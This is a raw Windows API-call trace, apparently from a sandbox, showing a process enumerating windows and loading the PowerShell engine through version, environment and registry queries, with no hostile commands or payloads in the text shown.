	[0945.377] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x514
	[0945.377] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe48
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xbc8
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xdf8
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x318
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xcac
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x8bc
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xf9c
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xf48
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe40
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xecc
	[0945.378] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xeb8
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe80
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe98
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe60
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xee4
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xf00
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xdf0
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xe1c
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xdd0
	[0945.379] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xd94
	[0945.380] GetWindow (hWnd=0x1036c, uCmd=0x4) returned 0x0
	[0945.381] IsWindowVisible (hWnd=0x1036c) returned 0
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xd74
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xd00
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xcd8
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc84
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xca4
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc64
	[0945.381] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xc24
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xb84
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xbac
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x384
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xab8
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x33c
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa44
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa64
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x8a8
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xaf0
	[0945.382] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x88c
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xb04
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x910
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x230
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xac0
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xab4
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xaac
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x3d0
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x978
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa7c
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x59c
	[0945.383] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa88
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa6c
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa68
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x9f8
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xa04
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x924
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x8dc
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x7dc
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x768
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x764
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x820
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x810
	[0945.384] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x794
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x83c
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x7ac
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xb44
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x6bc
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0xb5c
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x838
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.385] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x4d0
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x818
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x5b8
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x494
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x1ec
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x440
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x7e8
	[0945.386] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x730
	[0945.387] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x2c8
	[0945.387] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d700 | out: lpdwProcessId=0x14d700) returned 0x31c
	[0945.391] WerSetFlags () returned 0x0
	[0945.979] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0945.979] CoTaskMemFree (pv=0x0) 
	[0945.980] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14da68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14da60 | out: pulNumLanguages=0x14da68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14da60) returned 1
	[0945.980] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14da68, pwszLanguagesBuffer=0x2d8f1d8, pcchLanguagesBuffer=0x14da60 | out: pulNumLanguages=0x14da68, pwszLanguagesBuffer=0x2d8f1d8, pcchLanguagesBuffer=0x14da60) returned 1
	[0945.986] CoTaskMemAlloc (cb=0x24) returned 0x287fb0
	[0945.986] GetUserDefaultLocaleName (in: lpLocaleName=0x287fb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0945.986] CoTaskMemFree (pv=0x287fb0) 
	[0946.012] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0946.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.012] CoTaskMemFree (pv=0x27fcf0) 
	[0946.015] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0946.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.015] CoTaskMemFree (pv=0x27fcf0) 
	[0946.017] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0946.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.017] CoTaskMemFree (pv=0x27fcf0) 
	[0946.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0946.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0946.776] SetErrorMode (uMode=0x1) returned 0x1
	[0946.776] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d6e0 | out: lpFileInformation=0x14d6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0946.776] SetErrorMode (uMode=0x1) returned 0x1
	[0946.776] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14d950 | out: lpdwHandle=0x14d950) returned 0x94c
	[0946.777] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d92a68 | out: lpData=0x2d92a68) returned 1
	[0946.778] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d8c8, puLen=0x14d8c0 | out: lplpBuffer=0x14d8c8*=0x2d92b04, puLen=0x14d8c0) returned 1
	[0946.778] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92be0, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0946.779] CoTaskMemAlloc (cb=0x2e) returned 0x246520
	[0946.779] lstrcpyW (in: lpString1=0x246520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0946.779] CoTaskMemFree (pv=0x246520) 
	[0946.779] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92c34, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="System.Management.Automation") returned 28
	[0946.779] CoTaskMemAlloc (cb=0x3c) returned 0x1f4b00
	[0946.779] lstrcpyW (in: lpString1=0x1f4b00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0946.779] CoTaskMemFree (pv=0x1f4b00) 
	[0946.779] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92c90, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0946.779] CoTaskMemAlloc (cb=0x20) returned 0x288010
	[0946.779] lstrcpyW (in: lpString1=0x288010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0946.779] CoTaskMemFree (pv=0x288010) 
	[0946.779] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92cd0, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0946.779] CoTaskMemAlloc (cb=0x44) returned 0x1f4b00
	[0946.779] lstrcpyW (in: lpString1=0x1f4b00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0946.779] CoTaskMemFree (pv=0x1f4b00) 
	[0946.779] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92d38, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0946.779] CoTaskMemAlloc (cb=0x76) returned 0x21f0d0
	[0946.779] lstrcpyW (in: lpString1=0x21f0d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0946.779] CoTaskMemFree (pv=0x21f0d0) 
	[0946.779] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92dd4, puLen=0x14d830) returned 1
	[0946.779] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0946.779] CoTaskMemAlloc (cb=0x44) returned 0x1f4b00
	[0946.779] lstrcpyW (in: lpString1=0x1f4b00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0946.780] CoTaskMemFree (pv=0x1f4b00) 
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92e38, puLen=0x14d830) returned 1
	[0946.780] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0946.780] CoTaskMemAlloc (cb=0x58) returned 0x24a410
	[0946.780] lstrcpyW (in: lpString1=0x24a410, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0946.780] CoTaskMemFree (pv=0x24a410) 
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92eb4, puLen=0x14d830) returned 1
	[0946.780] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0946.780] CoTaskMemAlloc (cb=0x20) returned 0x288010
	[0946.780] lstrcpyW (in: lpString1=0x288010, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0946.780] CoTaskMemFree (pv=0x288010) 
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x2d92b5c, puLen=0x14d830) returned 1
	[0946.780] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0946.780] CoTaskMemAlloc (cb=0x66) returned 0x1f11c0
	[0946.780] lstrcpyW (in: lpString1=0x1f11c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0946.780] CoTaskMemFree (pv=0x1f11c0) 
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x0, puLen=0x14d830) returned 0
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x0, puLen=0x14d830) returned 0
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14d838, puLen=0x14d830 | out: lplpBuffer=0x14d838*=0x0, puLen=0x14d830) returned 0
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14d808, puLen=0x14d800 | out: lplpBuffer=0x14d808*=0x2d92b04, puLen=0x14d800) returned 1
	[0946.780] CoTaskMemAlloc (cb=0x204) returned 0x236b50
	[0946.780] VerLanguageNameW (in: wLang=0x0, szLang=0x236b50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0946.780] CoTaskMemFree (pv=0x236b50) 
	[0946.780] VerQueryValueW (in: pBlock=0x2d92a68, lpSubBlock="\\", lplpBuffer=0x14d858, puLen=0x14d850 | out: lplpBuffer=0x14d858*=0x2d92a90, puLen=0x14d850) returned 1
	[0946.788] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0946.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.788] CoTaskMemFree (pv=0x27fcf0) 
	[0946.790] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0946.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.790] CoTaskMemFree (pv=0x27fcf0) 
	[0946.795] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d728 | out: phkResult=0x14d728*=0x2ec) returned 0x0
	[0946.796] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d718 | out: phkResult=0x14d718*=0x2f0) returned 0x0
	[0946.796] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d7a8 | out: phkResult=0x14d7a8*=0x2f4) returned 0x0
	[0946.798] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6ec, lpData=0x0, lpcbData=0x14d6e8*=0x0 | out: lpType=0x14d6ec*=0x1, lpData=0x0, lpcbData=0x14d6e8*=0x56) returned 0x0
	[0946.799] CoTaskMemAlloc (cb=0x5a) returned 0x286cf0
	[0946.799] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d6bc, lpData=0x286cf0, lpcbData=0x14d6b8*=0x56 | out: lpType=0x14d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d6b8*=0x56) returned 0x0
	[0946.799] CoTaskMemFree (pv=0x286cf0) 
	[0946.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0946.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0947.442] CoTaskMemAlloc (cb=0x104) returned 0x27fcf0
	[0947.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fcf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.443] CoTaskMemFree (pv=0x27fcf0) 
	[0951.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0951.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0954.292] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0954.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.292] CoTaskMemFree (pv=0x27fe00) 
	[0954.293] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
	[0954.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27fe00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.294] CoTaskMemFree (pv=0x27fe00) 
	[0955.426] CoTaskMemAlloc (cb=0x104) returned 0x27fe00
